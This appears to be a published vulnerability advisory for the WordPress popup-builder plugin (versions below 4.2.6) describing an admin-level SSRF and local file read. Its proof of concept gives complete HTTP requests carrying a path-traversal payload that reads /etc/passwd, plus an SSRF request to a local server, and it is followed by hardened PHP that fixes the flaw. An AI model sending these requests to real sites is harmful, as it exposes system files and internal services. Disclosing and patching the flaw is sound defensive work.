WordPress Plugin Vulnerabilities
popup-builder < 4.2.6 - Admin+ SSRF & File Read
Description
The plugin does not validate the importListURL parameter before making a request to it, which allows users with the administrator role in Multisite WordPress configurations (site administrators without super-admin rights) to perform SSRF attacks and read local files.
Proof of Concept
1. Create a multisite WordPress setup, e.g. using Docker containers, and set up a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the popup-builder plugin and activate it for the network.
3. Log in as that new administrator to the separate site (here: "site2" at "/site2/").
4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy Subscription.
5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the File field.
6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce.
7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd":

   POST /site2/wp-admin/admin-ajax.php HTTP/1.1
   Host: localhost
   Content-Length: 156
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   Cookie: [cookie]
   Connection: close

   action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend=

   This will output the first line of /etc/passwd in the response:

   <div class="subFormItem__title"> root:x:0:0:root:/root:/bin/bash </div>

8. Alternatively, "importListURL" can be set to any URL, allowing for SSRF, e.g. "importListURL=http://localhost:1337" with "python -m http.server 1337" serving a "hacked.txt":

   POST /site2/wp-admin/admin-ajax.php HTTP/1.1
   Host: localhost
   Content-Length: 130
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   Cookie: [Cookies]
   Connection: close

   action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend=

   Response:

   <div class="subFormItem__title"> Hacked </div>

   Output from python:

   root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337
   Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
   127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -
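The missing validation the description refers to is easiest to see next to a handler that performs it. The following is an added example written for this page, not the popup-builder plugin's own code: the AJAX action name, nonce name and function names are illustrative, and it assumes (as the PoC suggests) that the vulnerable handler passed importListURL straight to a fetch that accepted local paths as well as URLs. It relies on two WordPress core functions, wp_http_validate_url() and wp_safe_remote_get(), so the same URL check runs both before and at the moment of the request.

```php
<?php
/*
 * Added example, not the plugin's own code. Hardened subscriber-import handler
 * for a WordPress multisite plugin: a site administrator supplies importListURL,
 * and the handler only fetches it if it is an absolute http(s) URL that WordPress
 * considers safe. The action and nonce names are assumptions for illustration.
 */

add_action( 'wp_ajax_example_import_subscribers', 'example_import_subscribers' );

function example_import_subscribers() {
    // Capability and nonce checks. The advisory shows that the intercepted request
    // already carried a valid nonce, so the nonce alone cannot stop an authenticated
    // site administrator; the URL itself has to be validated as well.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'example_import_nonce', 'nonce' );

    $raw = isset( $_POST['importListURL'] ) ? wp_unslash( $_POST['importListURL'] ) : '';
    $url = example_validate_import_url( $raw );
    if ( is_wp_error( $url ) ) {
        wp_send_json_error( $url->get_error_message(), 400 );
    }

    // wp_safe_remote_get() sets reject_unsafe_urls, so WordPress re-validates the
    // URL (including the host it resolves to) immediately before sending the request.
    // Redirects are disabled so a benign-looking URL cannot bounce to an internal host.
    $response = wp_safe_remote_get( $url, array( 'timeout' => 10, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) ) {
        wp_send_json_error( 'fetch failed', 502 );
    }

    $body = wp_remote_retrieve_body( $response );
    // Parse $body as a subscriber list here. Do not echo the fetched content back
    // into the page unfiltered: in the advisory the response body is what leaked /etc/passwd.
    wp_send_json_success( array( 'bytes' => strlen( $body ) ) );
}

/*
 * Returns the validated URL string, or a WP_Error explaining why it was rejected.
 */
function example_validate_import_url( $raw ) {
    $raw = trim( (string) $raw );
    if ( '' === $raw ) {
        return new WP_Error( 'empty', 'No import URL supplied.' );
    }

    $parts = wp_parse_url( $raw );
    // A bare path such as ../../etc/passwd has neither scheme nor host. Rejecting it
    // here means nothing that might treat the value as a local filename ever sees it.
    if ( empty( $parts['scheme'] ) || empty( $parts['host'] ) ) {
        return new WP_Error( 'not_absolute', 'Import URL must be an absolute http(s) URL.' );
    }
    if ( ! in_array( strtolower( $parts['scheme'] ), array( 'http', 'https' ), true ) ) {
        return new WP_Error( 'bad_scheme', 'Only http and https URLs are allowed.' );
    }

    // wp_http_validate_url() rejects URLs with userinfo, ports other than 80/443/8080,
    // and hosts that resolve to loopback or private ranges (unless the site opts in
    // through the http_request_host_is_external filter). It returns the URL or false.
    $validated = wp_http_validate_url( $raw );
    if ( false === $validated ) {
        return new WP_Error( 'unsafe_url', 'Import URL points to a disallowed host or port.' );
    }
    return $validated;
}
```

With this handler both PoC payloads fail closed: the traversal string is rejected as not being an absolute URL, and http://localhost:1337/hacked.txt is rejected by wp_http_validate_url() for its loopback host and non-standard port. The error messages are sent to the caller but the fetched body never is, which removes the output channel the advisory's file read depended on.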
Miscellaneous
Original Researcher
Sebastian Neef
Submitter
Sebastian Neef
Verified
Yes
Timeline
Publicly Published
2024-01-17 (about 3 months ago)
Added
2024-01-17 (about 3 months ago)
Last Updated
2024-01-17 (about 3 months ago)